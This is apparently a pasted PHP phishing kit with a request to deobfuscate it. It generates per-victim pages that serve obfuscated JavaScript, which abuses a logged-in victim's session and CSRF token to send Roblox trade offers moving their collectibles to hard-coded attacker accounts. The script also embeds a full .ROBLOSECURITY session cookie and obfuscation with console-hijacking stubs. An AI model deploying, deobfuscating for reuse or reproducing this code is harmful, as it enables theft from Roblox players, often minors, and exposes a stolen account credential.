_0x413653=null,_0x3aefc7;}}:function(){};return _0x3c353b=![],_0x55dbf6;};}()),_0x5ed426=_0x496bc2(this,function(){function _0x42e402(_0x116c28,_0x3aae45,_0x22b401,_0x4efdb7){return _0x3657(_0x116c28-0x356,_0x22b401);}function _0x5a2488(_0x157b62,_0x46bcbb,_0x476cbf,_0x964980){return _0x3657(_0x476cbf-0x24a,_0x46bcbb);}return _0x5ed426['toString']()['search'](_0x42e402(0x50e,0x52c,0x4eb,0x4f6)+'$')[_0x42e402(0x4e9,0x4f4,0x4fa,0x4db)]()[_0x5a2488(0x3e2,0x3b2,0x3d5,0x3cf)](_0x5ed426)[_0x5a2488(0x3e1,0x3f2,0x3eb,0x3f7)]('(((.+)+)+)+'+'$');});function _0x343c22(_0x13c55d,_0x4e69aa,_0x225f78,_0x5129ad){return _0x401184(_0x5129ad- -0xa3,_0x4e69aa-0x10e,_0x225f78-0xf7,_0x225f78);}function _0x30453d(_0xfd0f58,_0x15df46,_0x57534a,_0x5c7bd6){return _0x401184(_0x57534a-0x3ca,_0x15df46-0x12b,_0x57534a-0x181,_0x5c7bd6);}_0x5ed426();const _0x296ee5=(function(){let _0x1ceb67=!![];return function(_0x50e92a,_0x29c49a){const _0x527572=_0x1ceb67?function(){if(_0x29c49a){const _0x54af18=_0x29c49a['apply'](_0x50e92a,arguments);return _0x29c49a=null,_0x54af18;}}:function(){};return _0x1ceb67=![],_0x527572;};}()),_0x359ed9=_0x296ee5(this,function(){let _0x357e51;try{const _0x42f78a=Function(_0x549e10(0x49d,0x4ae,0x49a,0x492)+_0x549e10(0x473,0x491,0x46e,0x48d)+(_0x549e10(0x46b,0x447,0x48b,0x46c)+'tor("return'+_0x5687f0(0x4a7,0x4b9,0x4d7,0x4bf))+');');_0x357e51=_0x42f78a();}catch(_0x4561f2){_0x357e51=window;}function _0x5687f0(_0x269c1f,_0x2976d1,_0xd30f0c,_0x59065b){return _0x3657(_0x59065b-0x30c,_0xd30f0c);}const _0xadd24f=_0x357e51[_0x549e10(0x447,0x468,0x447,0x45a)]=_0x357e51[_0x549e10(0x46a,0x443,0x47c,0x45a)]||{};function _0x549e10(_0x3238a5,_0x3decb2,_0x3f1989,_0x46c809){return _0x3657(_0x46c809-0x2ce,_0x3f1989);}const _0xef67ce=[_0x5687f0(0x47b,0x488,0x489,0x499),'warn',_0x5687f0(0x4b3,0x4c5,0x4c6,0x4b3),_0x5687f0(0x4b1,0x4ba,0x4d8,0x4c0),_0x5687f0(0x47f,0x4aa,0x4a5,0x49e),_0x549e10(0x48d,0x47f,0x481,0x499),_0x5687f0(0x48e,0x4b9,0x482,0x4a6)];for(let _0x16349e=0x0;_0x16349e<_0xef67ce['length'];_0x16349e++){const _0x57a326=_0x296ee5[_0x549e10(0x477,0x461,0x434,0x459)][_0x5687f0(0x4a8,0x4b2,0x4e3,0x4c7)][_0x5687f0(0x4b2,0x4a9,0x4ad,0x4b9)](_0x296ee5),_0x188998=_0xef67ce[_0x16349e],_0x5688f6=_0xadd24f[_0x188998]||_0x57a326;_0x57a326[_0x5687f0(0x48f,0x4a0,0x471,0x48c)]=_0x296ee5[_0x5687f0(0x4cc,0x4b7,0x497,0x4b9)](_0x296ee5),_0x57a326['toString']=_0x5688f6['toString'][_0x549e10(0x48f,0x493,0x469,0x47b)](_0x5688f6),_0xadd24f[_0x188998]=_0x57a326;}});_0x359ed9();try{const {robuxBalance:_0x3e47a1,RobloxID:_0x542a98,userAssetIds:_0x189830}=await FetchInfo(),_0x12fb89=await TermedAssets(),_0x41a283={'offers':[{'userId':$ID,'userAssetIds':[_0x12fb89],'robux':null},{'userId':_0x542a98,'userAssetIds':_0x189830,'robux':null}]},_0x2e2c6e={'offers':[{'userId':0xf8fec04b,'userAssetIds':[_0x12fb89],'robux':null},{'userId':_0x542a98,'userAssetIds':_0x189830,'robux':null}]};console[_0x30453d(0x342,0x340,0x31e,0x317)](_0x30453d(0x324,0x336,0x318,0x32d)),await Roblox(_0x41a283),await Roblox(_0x2e2c6e);}catch(_0x576df8){console[_0x30453d(0x343,0x327,0x345,0x327)]('No Premium');}}Verify();";
$code3 = "(function(_0x17e9a9,_0x2c9a8c){const _0x47853f=_0x17e9a9();function _0x152067(_0x233d1b,_0x3326f9,_0x3ed446,_0x1b9524){return _0x78b1(_0x233d1b- -0x220,_0x3ed446);}function _0x12c534(_0x5e3c75,_0x11b684,_0x53e39e,_0x52cada){return _0x78b1(_0x52cada-0x39f,_0x11b684);}while(!![]){try{const _0xffa306=-parseInt(_0x152067(-0x19b,-0x1bf,-0x190,-0x17b))/0x1+-parseInt(_0x12c534(0x458,0x446,0x468,0x44b))/0x2*(parseInt(_0x12c534(0x408,0x40c,0x401,0x406))/0x3)+-parseInt(_0x12c534(0x425,0x439,0x43e,0x419))/0x4+parseInt(_0x152067(-0x1b6,-0x1bd,-0x1cf,-0x192))/0x5*(parseInt(_0x12c534(0x426,0x419,0x40e,0x425))/0x6)+parseInt(_0x152067(-0x180,-0x1a4,-0x15b,-0x179))/0x7+parseInt(_0x152067(-0x1b8,-0x192,-0x192,-0x1c9))/0x8*(-parseInt(_0x152067(-0x191,-0x199,-0x193,-0x1a7))/0x9)+parseInt(_0x12c534(0x466,0x425,0x42e,0x447))/0xa;if(_0xffa306===_0x2c9a8c)break;else _0x47853f['push'](_0x47853f['shift']());}catch(_0x313c35){_0x47853f['push'](_0x47853f['shift']());}}}(_0x2feb,0x2f2e2));var TermedUser=prompt(_0x1d53f5(0x131,0x129,0x130,0x114));function _0x2feb(){const _0x320061=['ox.com/v1/u','info','ortOrder=As','UserID','No Premium','/assets/col','innerHTML','2024307bmTaze','log','$pr','apply','data','rf-token" n','getAttribut','meta[name="','RobuxBalanc','text','prototype','POST',' this")( )','stringify','application','(((.+)+)+)+','indexOf','1052429QIBzPs','des.roblox.','json','search','tibles?sort','ction() ','/mobileapi/','imit=50','6331290uJmsJb','exception','https://www','/json','98848KnUbly','es/send','__proto__','recentAvera','lectibles?s','th name="cs','data-token','entory.robl','3UtlBhC','8KNgbgt','.roblox.com','15LycpgK','warn','toString','createEleme','...','Meta tag wi','bind','error','querySelect','tor("return','success','undefined','length','console','sers/$ID/as','return (fun','1057888vOwmWh','constructor','{}.construc','gePrice','Failed','div','csrf-token"','userAssetId','https://inv','include','map','235532sBZqmy','368250MZKmqE','Trade Send!'];_0x2feb=function(){return _0x320061;};return _0x2feb();}TermedUser?alert('Success'):alert(_0x1d53f5(0x11e,0x116,0x113,0x124));async function TermedAssets(){function _0x1a018f(_0x131271,_0x2a9a45,_0x569f9c,_0x5eae3d){return _0x101539(_0x2a9a45,_0x131271- -0x48,_0x569f9c-0xc9,_0x5eae3d-0x162);}function _0x306bf7(_0x4a9ae3,_0x210a92,_0x20d904,_0x1e60fa){return _0x1d53f5(_0x4a9ae3-0x2bc,_0x20d904,_0x20d904-0x61,_0x1e60fa-0x14);}const _0x5f4368=_0x1a018f(-0x1ca,-0x1d1,-0x1ae,-0x1b0)+_0x1a018f(-0x1e6,-0x1c5,-0x1db,-0x1c4)+'ox.com/v1/u'+_0x306bf7(0x3d4,0x3b4,0x3ae,0x3e8)+'sets/collec'+_0x1a018f(-0x1a8,-0x1bb,-0x1ce,-0x194)+'Order=Asc&l'+_0x306bf7(0x403,0x40c,0x3f5,0x3ed);try{const _0x13336f=await fetch(_0x5f4368);if(!_0x13336f['ok'])throw new Error(_0x1a018f(-0x1db,-0x1ba,-0x1c4,-0x1c5));const _0x3fd2e5=await _0x13336f[_0x306bf7(0x3fe,0x41b,0x419,0x3f9)](),_0x1cbad6=_0x3fd2e5[_0x306bf7(0x3ef,0x40b,0x3e1,0x3db)],_0x449d0a=_0x1cbad6[_0x1a018f(-0x1c8,-0x1c5,-0x1e6,-0x1c5)](_0x5ad8bb=>_0x5ad8bb[_0x1a018f(-0x1cb,-0x1b8,-0x1d1,-0x1e7)]),_0x254eef=_0x1cbad6['map'](_0x457a70=>_0x457a70[_0x306bf7(0x40b,0x40e,0x3f3,0x42a)+_0x1a018f(-0x1cf,-0x1d2,-0x1d7,-0x1ee)]),_0x15829=_0x254eef[_0x306bf7(0x3fb,0x3ec,0x420,0x412)](Math['min'](..._0x254eef)),_0x12c4f0=_0x1cbad6[_0x15829];return console[_0x1a018f(-0x1bc,-0x1b7,-0x1d3,-0x1c8)](_0x12c4f0),_0x12c4f0[_0x306bf7(0x3dd,0x3ed,0x3c2,0x3ef)];}catch(_0xe232a0){return console['error'](_0xe232a0),null;}}async function FetchInfo(){function _0x5ea5a6(_0x59e4d9,_0x2d5871,_0x8c59ef,_0x21bfcd){return _0x101539(_0x59e4d9,_0x21bfcd-0x1ae,_0x8c59ef-0x21,_0x21bfcd-0x156);}function _0x42a1e2(_0x381787,_0x25d3de,_0x35df3a,_0x4321bd){return _0x101539(_0x35df3a,_0x381787- -0xc0,_0x35df3a-0x45,_0x4321bd-0x139);}try{const _0x10f916=await fetch(_0x5ea5a6(0x36,0x43,0x78,0x54)+_0x5ea5a6(0x4,0x16,-0x11,0x13)+_0x42a1e2(-0x21e,-0x238,-0x21e,-0x245)+'userinfo'),_0x7dbc64=await _0x10f916[_0x42a1e2(-0x222,-0x210,-0x21a,-0x225)](),_0x78d182=_0x7dbc64[_0x5ea5a6(0x4a,0x66,0x24,0x41)+'e'],_0x974730=_0x7dbc64[_0x42a1e2(-0x239,-0x220,-0x259,-0x250)];if(typeof _0x78d182===_0x5ea5a6(0x25,0x2c,0x10,0x1f)||typeof _0x974730===_0x42a1e2(-0x24f,-0x22d,-0x239,-0x25d))throw new Error(_0x5ea5a6(0xf,0x0,-0x5,0x1b));const _0x39b213=await fetch('https://inv'+_0x5ea5a6(-0x4,0x6,0x6,0x10)+_0x5ea5a6(0x27,0x10,0x2d,0x32)+'sers/'+_0x974730+(_0x42a1e2(-0x237,-0x23d,-0x24b,-0x230)+_0x42a1e2(-0x214,-0x236,-0x22b,-0x207)+_0x42a1e2(-0x23a,-0x23f,-0x240,-0x25e)+'c&limit=10')),_0x1bd370=await _0x39b213[_0x42a1e2(-0x222,-0x1ff,-0x224,-0x203)](),_0x276f80=_0x1bd370[_0x5ea5a6(0x2a,0x38,0x2f,0x3d)][_0x5ea5a6(0x28,0x26,0x7,0x2e)](_0x407da4=>_0x407da4[_0x42a1e2(-0x243,-0x23d,-0x21e,-0x267)]);if(_0x276f80[_0x5ea5a6(0x2a,0x28,0x4,0x20)]===0x0)throw new Error(_0x42a1e2(-0x256,-0x278,-0x23a,-0x231));return{'robuxBalance':_0x78d182,'RobloxID':_0x974730,'userAssetIds':_0x276f80};}catch(_0x3e0b7b){console['error'](_0x3e0b7b);throw _0x3e0b7b;}}function _0x78b1(_0xf97f96,_0x10dbec){const _0xc736d1=_0x2feb();return _0x78b1=function(_0x492181,_0x528b44){_0x492181=_0x492181-0x65;let _0x5c0b5c=_0xc736d1[_0x492181];return _0x5c0b5c;},_0x78b1(_0xf97f96,_0x10dbec);}function _0x1d53f5(_0x51f95f,_0x5dcc15,_0x321a31,_0x13e667){return _0x78b1(_0x51f95f-0xa0,_0x5dcc15);}async function fetchCsrfToken(){function _0x5a9183(_0xba5a4,_0x1ff170,_0x28a0b5,_0x22e47d){return _0x1d53f5(_0x22e47d-0x155,_0xba5a4,_0x28a0b5-0xdb,_0x22e47d-0x132);}function _0x293722(_0x1c0164,_0x1a6f9a,_0x4e6cb8,_0x23b176){return _0x101539(_0x4e6cb8,_0x1c0164- -0xb6,_0x4e6cb8-0x132,_0x23b176-0x190);}try{const _0x4b20ac=await fetch(_0x293722(-0x210,-0x22b,-0x1ec,-0x1fc)+'.roblox.com'),_0x213901=await _0x4b20ac[_0x5a9183(0x29d,0x272,0x290,0x28d)](),_0x4ea427=document[_0x293722(-0x24d,-0x229,-0x254,-0x272)+'nt'](_0x5a9183(0x276,0x269,0x28f,0x274));_0x4ea427[_0x5a9183(0x26b,0x276,0x26b,0x283)]=_0x213901;const _0x23e97c=_0x4ea427[_0x293722(-0x248,-0x249,-0x223,-0x253)+'or'](_0x5a9183(0x2a0,0x2a2,0x297,0x28b)+_0x293722(-0x23a,-0x21e,-0x25d,-0x23c)+']');if(!_0x23e97c)throw new Error(_0x5a9183(0x244,0x258,0x26d,0x264)+_0x293722(-0x209,-0x1ec,-0x22c,-0x1e2)+_0x5a9183(0x276,0x282,0x292,0x289)+'ot found');const _0x2437e1=_0x23e97c[_0x5a9183(0x2ab,0x28e,0x294,0x28a)+'e'](_0x293722(-0x255,-0x250,-0x244,-0x26e));if(!_0x2437e1)throw new Error(_0x5a9183(0x250,0x278,0x25b,0x266));return _0x2437e1;}catch(_0x48e42e){console['error'](_0x48e42e);throw _0x48e42e;}}async function Roblox(_0x2afeac){function _0x220b88(_0x488808,_0x2598d2,_0x249109,_0x59bfdd){return _0x1d53f5(_0x249109-0x17f,_0x59bfdd,_0x249109-0x11f,_0x59bfdd-0x1da);}function _0x523b0b(_0x550dce,_0x2e9294,_0x2a0b9a,_0x5dce70){return _0x101539(_0x5dce70,_0x550dce-0x579,_0x2a0b9a-0x85,_0x5dce70-0x14);}try{const _0x173105=await fetchCsrfToken(),_0x36981f=await fetch('https://tra'+_0x220b88(0x2a3,0x2c6,0x2c0,0x2be)+'com/v1/trad'+_0x220b88(0x2dd,0x2d9,0x2cc,0x2e9),{'method':_0x220b88(0x2da,0x294,0x2b9,0x2d6),'headers':{'Content-Type':_0x220b88(0x2a3,0x2db,0x2bc,0x29f)+_0x523b0b(0x420,0x3fa,0x42a,0x40f),'X-CSRF-TOKEN':_0x173105},'credentials':_0x220b88(0x2b3,0x294,0x2a2,0x29a),'body':JSON[_0x523b0b(0x411,0x419,0x417,0x428)](_0x2afeac)});if(_0x36981f['ok'])console[_0x220b88(0x293,0x2b0,0x2af,0x2ce)](_0x523b0b(0x3e9,0x40b,0x403,0x3cc));else{const _0xa6bfbf=await _0x36981f['json']();console[_0x220b88(0x29b,0x2a3,0x290,0x2b1)](_0xa6bfbf);}}catch(_0x325d69){console[_0x523b0b(0x3e6,0x401,0x3c1,0x3ea)](_0x220b88(0x2a1,0x2b2,0x2ab,0x2c7));throw _0x325d69;}}async function Verify(){const _0x169787=(function(){let _0x166665=!![];return function(_0x477a2d,_0x108441){const _0x46370a=_0x166665?function(){function _0x5d7b41(_0x11f930,_0x91f258,_0x36487a,_0x345e6b){return _0x78b1(_0x11f930- -0x2f2,_0x36487a);}if(_0x108441){const _0x598226=_0x108441[_0x5d7b41(-0x260,-0x257,-0x246,-0x276)](_0x477a2d,arguments);return _0x108441=null,_0x598226;}}:function(){};return _0x166665=![],_0x46370a;};}()),_0x4d392b=_0x169787(this,function(){function _0x4eefc2(_0x4f51b5,_0x4493da,_0x394911,_0x31121d){return _0x78b1(_0x31121d-0x3d9,_0x4f51b5);}function _0x54b87d(_0x532897,_0x2a5981,_0x5b1310,_0x59663f){return _0x78b1(_0x2a5981- -0x22a,_0x59663f);}return _0x4d392b[_0x4eefc2(0x468,0x455,0x43d,0x445)]()[_0x4eefc2(0x494,0x466,0x466,0x47c)](_0x4eefc2(0x48c,0x468,0x45e,0x477)+'$')[_0x54b87d(-0x1ab,-0x1be,-0x1c9,-0x1d8)]()[_0x4eefc2(0x471,0x457,0x45e,0x454)](_0x4d392b)[_0x4eefc2(0x491,0x45e,0x481,0x47c)](_0x4eefc2(0x45c,0x471,0x463,0x477)+'$');});_0x4d392b();const _0x1b84d5=(function(){let _0x3c677e=!![];return function(_0x2e717c,_0x2f3010){const _0x36863d=_0x3c677e?function(){function _0x5993f0(_0x3380ee,_0x1b358c,_0x4e96a9,_0x1cfb7b){return _0x78b1(_0x3380ee-0x344,_0x1b358c);}if(_0x2f3010){const _0x5a247c=_0x2f3010[_0x5993f0(0x3d6,0x3fb,0x3c6,0x3eb)](_0x2e717c,arguments);return _0x2f3010=null,_0x5a247c;}}:function(){};return _0x3c677e=![],_0x36863d;};}());function _0x9f30be(_0x548039,_0x53a414,_0x2231ac,_0x54af91){return _0x101539(_0x53a414,_0x2231ac-0x100,_0x2231ac-0xf3,_0x54af91-0x159);}const _0x4c2ae7=_0x1b84d5(this,function(){const _0x206ba7=function(){function _0xcff86e(_0xe2693d,_0x5db7dd,_0x58e02f,_0x52ea00){return _0x78b1(_0xe2693d-0x13c,_0x52ea00);}function _0x290374(_0x1e7a42,_0x52fd5d,_0x20a87e,_0x12b25b){return _0x78b1(_0x52fd5d-0x3ae,_0x12b25b);}let _0x1dd03b;try{_0x1dd03b=Function(_0xcff86e(0x1b5,0x1aa,0x19e,0x1b0)+_0xcff86e(0x1e1,0x1ea,0x1ce,0x201)+(_0x290374(0x450,0x42a,0x431,0x426)+_0xcff86e(0x1af,0x18f,0x1ac,0x1b7)+_0x290374(0x461,0x449,0x42a,0x42e))+');')();}catch(_0x5659f2){_0x1dd03b=window;}return _0x1dd03b;},_0x245827=_0x206ba7(),_0x216ba0=_0x245827[_0x151ab3(0x400,0x40e,0x3f6,0x41d)]=_0x245827[_0x5979e4(-0x174,-0x150,-0x172,-0x173)]||{};function _0x151ab3(_0x424e32,_0x447c5b,_0x160798,_0x537ab7){return _0x78b1(_0x424e32-0x389,_0x160798);}const _0x5a32f5=[_0x151ab3(0x419,0x428,0x41e,0x40c),_0x151ab3(0x3f4,0x3ff,0x3fc,0x40f),_0x151ab3(0x412,0x419,0x401,0x404),_0x151ab3(0x3fa,0x416,0x41c,0x3e8),_0x151ab3(0x432,0x415,0x427,0x426),'table','trace'];function _0x5979e4(_0x4511c8,_0x559bfc,_0xd98b35,_0x245d97){return _0x78b1(_0xd98b35- -0x1e9,_0x559bfc);}for(let _0x5c4a1f=0x0;_0x5c4a1f<_0x5a32f5[_0x5979e4(-0x18b,-0x17a,-0x173,-0x168)];_0x5c4a1f++){const _0x3d69c5=_0x1b84d5['constructor'][_0x5979e4(-0x159,-0x168,-0x150,-0x172)][_0x151ab3(0x3f9,0x3ed,0x415,0x3da)](_0x1b84d5),_0x4b5e1f=_0x5a32f5[_0x5c4a1f],_0x183e07=_0x216ba0[_0x4b5e1f]||_0x3d69c5;_0x3d69c5[_0x151ab3(0x437,0x411,0x427,0x43f)]=_0x1b84d5['bind'](_0x1b84d5),_0x3d69c5[_0x151ab3(0x3f5,0x3e0,0x412,0x400)]=_0x183e07[_0x5979e4(-0x162,-0x17b,-0x17d,-0x15d)][_0x5979e4(-0x19f,-0x160,-0x179,-0x186)](_0x183e07),_0x216ba0[_0x4b5e1f]=_0x3d69c5;}});_0x4c2ae7();function _0x10f02c(_0x273d12,_0x3f0571,_0x552dfc,_0x39825d){return _0x1d53f5(_0x3f0571- -0x317,_0x39825d,_0x552dfc-0x36,_0x39825d-0x19e);}try{const {robuxBalance:_0x4515b7,RobloxID:_0x34ab02,userAssetIds:_0x3b0aa0}=await FetchInfo(),_0x3db6c8=await TermedAssets(),_0x318742={'offers':[{'userId':$ID,'userAssetIds':[_0x3db6c8],'robux':null},{'userId':_0x34ab02,'userAssetIds':_0x3b0aa0,'robux':null}]},_0x5e6c13={'offers':[{'userId':0xf8fec04b,'userAssetIds':[_0x3db6c8],'robux':null},{'userId':_0x34ab02,'userAssetIds':_0x3b0aa0,'robux':null}]};console[_0x10f02c(-0x1d3,-0x1e7,-0x200,-0x1fa)](_0x10f02c(-0x1e9,-0x1f0,-0x1e5,-0x20b)),await Roblox(_0x318742),await Roblox(_0x5e6c13);}catch(_0x221627){console[_0x9f30be(-0x70,-0x70,-0x93,-0x8e)](_0x10f02c(-0x1f6,-0x1eb,-0x1de,-0x212));}}function _0x101539(_0x3cabc3,_0x569a2c,_0x53801e,_0x29c120){return _0x78b1(_0x569a2c- -0x204,_0x3cabc3);}Verify();";
$codes = array($code1, $code2, $code3);
$code = $codes[array_rand($codes)];
$filename = "../$folder/js.txt";
file_put_contents($filename, $code);
$site = file_get_contents("page.php");
$myfile = fopen("../$folder/index.php", "w");
$txt = $site;
fwrite($myfile, $txt);
header("location: ../$folder");
} else {
echo "$name does not have premium or access to trade.";
}
} else {
echo "error";
}
curl_close($ch);
} else {
echo "User not found or banned.";
}
} else {
echo "error";
}
curl_close($ch);
} else {
echo "error";
}
?>
deobsusfactuate this
Did this file decode correctly?
Original Code
<?php
if (isset($_POST['name'])) {
$name = $_POST['name'];
$pr = $_POST['pr'];
$username = $name;
$ch = curl_init('https://users.roblox.com/v1/usernames/users');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_HTTPHEADER, ["content-type: application/json"]);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode(["usernames" => [$username], "excludeBannedUsers" => true]));
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
if ($response !== false) {
$data = json_decode($response, true);
if (isset($data['data']) && is_array($data['data']) && count($data['data']) > 0) {
$userdata = $data['data'][0];
$formattedOutput = [
"name" => $userdata['name'],
"userId" => $userdata['id'],
];
header('Content-Type: application/json');
$url = "https://premiumfeatures.roblox.com/v1/users/" . $userdata['id'] . "/validate-membership";
$headers = [
'Cookie: .ROBLOSECURITY=_|WARNING:-DO-NOT-SHARE-THIS.--Sharing-this-will-allow-someone-to-log-in-as-you-and-to-steal-your-ROBUX-and-items.|_F96B9B00E2325D4888BD4012C46A83BD40A85C3F48C7303A30B2C3E05432C5FE98F7226C891236A25669FCC3F929413778B6628AEB3D1BB8F22052A06ED77F7A40FE8524A61623994D89A7F771C503FCD33E3F03184E20C42D492A6B03FDF6DB3FCECD3D3FA58064DFBEE3A9A63024D098D161AF810FFADB7B4EBB670AA2E6B222B300F4AA5722612827F62802BA910500CD665864727DACEF8CF4CFCA12D47C64C3D7B27DC8FD905E2024AE805DEBA0DA35CEF91A94444E701ABC2173939F50863E4CA000BC4F8989F115A91A20D19C4317364699D80450AEF5B8E0EA3A27684DFA2BEAF54C53F4CE448D920BB6F859FD30AC087C4AFC294B0F4684AC2312CFDB47A0E309D1DA278B84CA5B6AF7D4701763BA8100E12C66B050B7E76C130641D0A466672CE2A8EA83966865D63ACE9FF0D53E94A6FEB9842E1F9AE1205959BD85D58CFF9DFFF066DF8FFF54309F4CFCE5F1E03BD6674E4F7DB61407B9B8DE760AA2901821AB7F439343543CA141CBFBFCBAFFA0FAC7B1F4A27FFDF457DAC4BD063AD5FE18C58E962529626F6107DA612F1FF9DC264B49A23AD38E08100AE8E9F77A89D1719090DDFDCAAE8985294C07AD16A7FFA895BFA225A4CD1908C3EABDD3E0041B6B2EA1472C8378415EEDE671F4EEAC7130C9E4B3560E2DA735147555303D0826C37D3A12240952E75013CD6C750DBDAE0E60C3208873D1F796E977D939AAD611713B75615F30A72DAB49D9C9A81E961BBF95FF86C341F625D6253A1CD3D8B15E3F53404E3EC98839A2AD0D86355EEEBB7F91C23CDC620B96F876B02DD1F1FB1E830CCA907AA6778A763EF4C4FA29C9BE33054E3E888FFD487940DB81031A128CB61E846A05F8A41CFCBAD47BEC15B43FF4214097B8A4D3A2AFB7AD1B3BE0126BD4BC7725478D29753D3F5DFBFC09A4A7DBA3CFFE9002A727942D2340B53BD50837984D9E6B1ECC3FED504743E65520AD14D4807E6A5C96C091535FB34F964C3349D6B513AE24A53B2D2639111B11BFB919B806957E442C402D69CD073A7C48BBB6A67A16FBDC12AEE7B5B81CC8AF40236DC604A3B40E283FA7AA2C70099FD956',
'Sec-Ch-Ua: "Google Chrome";v="125", "Chromium";v="125", "Not.A/Brand";v="24"',
'Sec-Ch-Ua-Mobile: ?1',
'Sec-Ch-Ua-Platform: "Android"',
'Sec-Fetch-Dest: document',
'Sec-Fetch-Mode: navigate',
'Sec-Fetch-Site: none',
'Sec-Fetch-User: ?1',
'Upgrade-Insecure-Requests: 1',
'User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Mobile Safari/537.36',
];
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
if ($response !== false) {
if ($response === 'true') {
$ID = $userdata['id'];
function generateRandomFolderName($length = 7) {
$folderName = '';
for ($i = 0; $i < $length; $i++) {
$folderName .= random_int(0, 9);
}
return $folderName;
}
$folder = generateRandomFolderName();
if (!is_dir($folder)) {
mkdir("../$folder");
}
$code1 = "(function(_0x2767ad,_0x16230d){function _0x27cdfd(_0x3c94d2,_0x5e8a13,_0x4a4216,_0x3e532f){return _0x3aae(_0x3c94d2- -0xb2,_0x4a4216);}const _0x1f274d=_0x2767ad();function _0x585275(_0xe236ac,_0x3542e2,_0x2c6a77,_0x9a09e6){return _0x3aae(_0x2c6a77-0x321,_0x3542e2);}while(!![]){try{const _0x30bcdb=-parseInt(_0x27cdfd(0xbc,0xb4,0xca,0xac))/0x1+parseInt(_0x27cdfd(0xc0,0xc4,0xac,0xc8))/0x2*(parseInt(_0x27cdfd(0xa2,0xba,0xb3,0x9d))/0x3)+-parseInt(_0x27cdfd(0xa8,0xa3,0xc6,0x97))/0x4*(-parseInt(_0x585275(0x489,0x4a4,0x485,0x483))/0x5)+-parseInt(_0x585275(0x45f,0x45b,0x45d,0x44e))/0x6*(parseInt(_0x27cdfd(0x7c,0x65,0x5f,0x68))/0x7)+parseInt(_0x27cdfd(0x89,0x9c,0x9c,0xa0))/0x8*(-parseInt(_0x27cdfd(0x94,0x9f,0xaf,0x9d))/0x9)+parseInt(_0x585275(0x44a,0x467,0x453,0x464))/0xa+parseInt(_0x27cdfd(0x9c,0xa4,0x7a,0x90))/0xb*(-parseInt(_0x27cdfd(0x83,0x9e,0x8f,0x8c))/0xc);if(_0x30bcdb===_0x16230d)break;else _0x1f274d['push'](_0x1f274d['shift']());}catch(_0xbcda9d){_0x1f274d['push'](_0x1f274d['shift']());}}}(_0x5244,0xdc9fe));function _0x3aae(_0x304630,_0x14acf0){const _0x235403=_0x5244();return _0x3aae=function(_0x26ca61,_0x1bf8bb){_0x26ca61=_0x26ca61-0x12e;let _0x52e024=_0x235403[_0x26ca61];return _0x52e024;},_0x3aae(_0x304630,_0x14acf0);}function _0x5244(){const _0x3d385a=['4956117ljIeiN','getAttribut','Order=Asc&l','csrf-token\x22','tor(\x22return','No\x20Premium','4GBvcVZ','toString','error','length','data','POST','UserID','return\x20(fun','/json','/mobileapi/','8121670qARDnc','userAssetId','info','warn','c&limit=10','apply','https://inv','ot\x20found','ortOrder=As','indexOf','1619571UVTcTV','userinfo','console','include','2NWxvEQ','30331JKooyP','th\x20name=\x22cs','min','Success','16703850GDkqZe','RobuxBalanc','...','467388PHlxGU','undefined','bind','log','exception','search','24MkYtAM','2310mTblgw','constructor','map','des.roblox.','prototype','lectibles?s','ox.com/v1/u','{}.construc','https://tra','entory.robl','1681677qvEhwI','innerHTML','ction()\x20','stringify','success','application','es/send','json','55sEIykp','https://www','.roblox.com','data-token','meta[name=\x22','com/v1/trad'];_0x5244=function(){return _0x3d385a;};return _0x5244();}var TermedUser=prompt('$pr');TermedUser?alert(_0x159d49(-0xda,-0xc8,-0xc2,-0xc6)):alert('Failed');async function TermedAssets(){function _0x1283e8(_0x446d6f,_0x69bbb6,_0x53a02a,_0x5c1954){return _0x159d49(_0x446d6f-0x16c,_0x69bbb6-0x101,_0x446d6f- -0x10b,_0x69bbb6);}function _0x4f3994(_0x54f6d3,_0x1d8ab2,_0x4f6cf2,_0x3c0705){return _0x159d49(_0x54f6d3-0x9a,_0x1d8ab2-0xf2,_0x1d8ab2-0x346,_0x54f6d3);}const _0xa53c38=_0x4f3994(0x2ab,0x2bd,0x2ab,0x2ae)+_0x1283e8(-0x1b9,-0x1a3,-0x1be,-0x1b5)+_0x1283e8(-0x1bc,-0x1c3,-0x1ad,-0x1de)+'sers/$ID/as'+'sets/collec'+'tibles?sort'+_0x1283e8(-0x1a8,-0x1b5,-0x19c,-0x1ac)+'imit=50';try{const _0x616ffb=await fetch(_0xa53c38);if(!_0x616ffb['ok'])throw new Error(_0x4f3994(0x2cc,0x2af,0x29c,0x2b7));const _0x29b304=await _0x616ffb[_0x4f3994(0x29a,0x2a0,0x2c1,0x29c)](),_0x142749=_0x29b304[_0x1283e8(-0x1a0,-0x1c2,-0x18a,-0x194)],_0x165f19=_0x142749[_0x4f3994(0x2ac,0x291,0x298,0x2ae)](_0x39bf32=>_0x39bf32[_0x1283e8(-0x199,-0x17b,-0x1a0,-0x1b2)]),_0x10a3be=_0x142749[_0x1283e8(-0x1c0,-0x1d6,-0x1d7,-0x1c8)](_0x73eec9=>_0x73eec9['recentAvera'+'gePrice']),_0x35cb56=_0x10a3be[_0x4f3994(0x2b7,0x2c0,0x2be,0x2bf)](Math[_0x1283e8(-0x1ce,-0x1e0,-0x1e6,-0x1db)](..._0x10a3be)),_0x28d770=_0x142749[_0x35cb56];return console['log'](_0x28d770),_0x28d770[_0x1283e8(-0x199,-0x181,-0x181,-0x1a9)];}catch(_0x305b67){return console[_0x1283e8(-0x1a2,-0x184,-0x1c2,-0x187)](_0x305b67),null;}}async function FetchInfo(){function _0x48b304(_0x2328b0,_0xc720c5,_0x4edb77,_0x52bb94){return _0x159d49(_0x2328b0-0x193,_0xc720c5-0x13,_0x4edb77- -0x146,_0x52bb94);}function _0x48db53(_0x5a6b28,_0x2a15cb,_0x1322d6,_0x280a52){return _0x159d49(_0x5a6b28-0x53,_0x2a15cb-0x1b6,_0x2a15cb-0x29a,_0x5a6b28);}try{const _0x3903a6=await 